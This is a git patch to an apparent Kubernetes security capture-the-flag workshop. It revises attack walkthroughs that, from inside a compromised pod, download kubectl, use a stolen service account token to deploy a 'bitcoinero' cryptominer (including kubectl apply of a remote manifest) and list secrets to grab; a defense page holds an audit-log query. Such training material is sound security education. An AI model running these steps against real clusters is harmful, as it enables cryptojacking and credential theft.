From c2f1fa8db62dd1b5e7330a369e3d7cc9adcaa38f Mon Sep 17 00:00:00 2001
From: Tommy Falgout <tommy@lastcoolnameleft.com>
Date: Wed, 22 Jan 2025 18:00:44 -0600
Subject: [PATCH] copy+paste does not work on long commands; update kubectl
 version

---
 docs/scenario_1_attack.md           |  2 +-
 docs/scenario_2_attack.md           | 51 ++++-------------------------
 docs/scenario_2_defense.md          |  2 +-
 docs/scenario_3_attack.md           |  2 +-
 workshop/scenario_1/bitcoinero.yaml | 13 --------
 5 files changed, 10 insertions(+), 60 deletions(-)

diff --git a/docs/scenario_1_attack.md b/docs/scenario_1_attack.md
index 88aaca8..c648458 100644
--- a/docs/scenario_1_attack.md
+++ b/docs/scenario_1_attack.md
@@ -138,7 +138,7 @@ ls /var/run/secrets/kubernetes.io/serviceaccount
 We have typical Kubernetes-related environment variables defined, and we have anonymous access to some parts of the Kubernetes API. We can see that the Kubernetes version is modern and supported -- but there's still hope if the Kubernetes security configuration is sloppy. Let's check for that next:
 
 ```console
-cd /usr/local/bin; curl -LO https://dl.k8s.io/release/v1.28.10/bin/linux/amd64/kubectl; chmod 555 kubectl
+cd /usr/local/bin; curl -LO https://dl.k8s.io/release/v1.30/bin/linux/amd64/kubectl; chmod 555 kubectl
 ```
 ```console
 kubectl get all
diff --git a/docs/scenario_2_attack.md b/docs/scenario_2_attack.md
index 2da8c28..b287781 100644
--- a/docs/scenario_2_attack.md
+++ b/docs/scenario_2_attack.md
@@ -43,56 +43,19 @@ And we will be connecting to the kubernetes API from inside the cluster this tim
 export API_SERVER="https://kubernetes.default.svc"
 ```
 
-Lastly, we will need curl for this and our SSH image didn't come with it preinstalled:
+Let's redownload kubectl here and create our miner:
 ```console
-apk update && apk add curl
-```
-
-Now the fun part, let's create our miner:
-```console
-curl -k -X POST "$API_SERVER/apis/apps/v1/namespaces/$NAMESPACE/deployments" \  
--H "Authorization: Bearer $TOKEN" \  
--H "Content-Type: application/json" \  
---data-binary '{
-    "apiVersion":"apps/v1",
-    "kind":"Deployment",
-    "metadata":{
-      "labels":{
-        "run":"bitcoinero"},
-        "name":"bitcoinero",
-        "namespace":"'$NAMESPACE'"},
-      "spec":{
-        "replicas":1,
-        "selector":{
-          "matchLabels":{
-            "run":"bitcoinero"}},
-        "strategy":{
-          "rollingUpdate":{
-            "maxSurge":"25%",
-            "maxUnavailable":"25%"},
-          "type":"RollingUpdate"},
-        "template":{
-          "metadata":{
-            "labels":{
-              "run":"bitcoinero"}},
-          "spec":{
-            "containers":[{
-                "image":"securekubernetes/bitcoinero:latest",
-                "name":"bitcoinero",
-                "command":["./moneymoneymoney"],
-                "args":["-c","1","-l","10"],
-                "resources":{
-                  "requests":{
-                    "cpu":"100m",
-                    "memory":"128Mi"},
-                  "limits":{
-                    "cpu":"200m",
-                    "memory":"128Mi"}}}]}}}}'
+cd /usr/local/bin; curl -LO https://dl.k8s.io/release/v1.30/bin/linux/amd64/kubectl; chmod 555 kubectl
+export KUBERNETES_SERVICE_HOST=kubernetes.default.svc
+export KUBERNETES_SERVICE_PORT=443
+kubectl apply -f https://raw.githubusercontent.com/azure/aks-ctf/refs/heads/main/workshop/scenario_1/bitcoinero.yaml
 ```
 
 Verify that the pod is running:
 ```console
+kubectl get pods -n default
 curl -k -X GET "$API_SERVER/api/v1/namespaces/$NAMESPACE/pods?labelSelector=run%3dbitcoinero" -H "Authorization: Bearer $TOKEN" -H "Accept: application/json" 2>/dev/null | grep phase
+kubectl get pods -A
 ```
 
 Time for some celebratory pizza!
\ No newline at end of file
diff --git a/docs/scenario_2_defense.md b/docs/scenario_2_defense.md
index a885bad..6f075a0 100644
--- a/docs/scenario_2_defense.md
+++ b/docs/scenario_2_defense.md
@@ -31,7 +31,7 @@ It's back! But how? Let's check the audit logs again:
 
 ```kql
 AKSAuditAdmin
-| where RequestUri startswith "/apis/apps/v1/namespaces/default/deployments" 
+| where RequestUri startswith "/apis/apps/v1/namespaces/dev/deployments" 
     and Verb == "create" 
     and ObjectRef contains "bitcoinero"
 | project User, SourceIps, UserAgent, ObjectRef, TimeGenerated
diff --git a/docs/scenario_3_attack.md b/docs/scenario_3_attack.md
index 0b1f4dd..255359c 100644
--- a/docs/scenario_3_attack.md
+++ b/docs/scenario_3_attack.md
@@ -8,7 +8,7 @@ Lets , let's see if there's any credentials accessible.
 
 ```
 # In case you need to re-download kubectl
-cd /usr/local/bin; curl -LO https://dl.k8s.io/release/v1.28.10/bin/linux/amd64/kubectl; chmod 555 kubectl
+cd /usr/local/bin; curl -LO https://dl.k8s.io/release/v1.30/bin/linux/amd64/kubectl; chmod 555 kubectl
 
 # Let's see if there's any secrets left out for us to grab
 kubectl get secrets
diff --git a/workshop/scenario_1/bitcoinero.yaml b/workshop/scenario_1/bitcoinero.yaml
index 508d41b..153b474 100644
--- a/workshop/scenario_1/bitcoinero.yaml
+++ b/workshop/scenario_1/bitcoinero.yaml
@@ -24,16 +24,3 @@ spec:
       containers:
       - image: ghcr.io/azure/aks-ctf/bitcoinero:latest
         name: bitcoinero
-        command: ["./moneymoneymoney"]
-        args:
-        - -c
-        - "1"
-        - -l
-        - "10"
-        resources:
-          requests:
-            cpu: 100m
-            memory: 128Mi
-          limits:
-            cpu: 200m
-            memory: 128Mi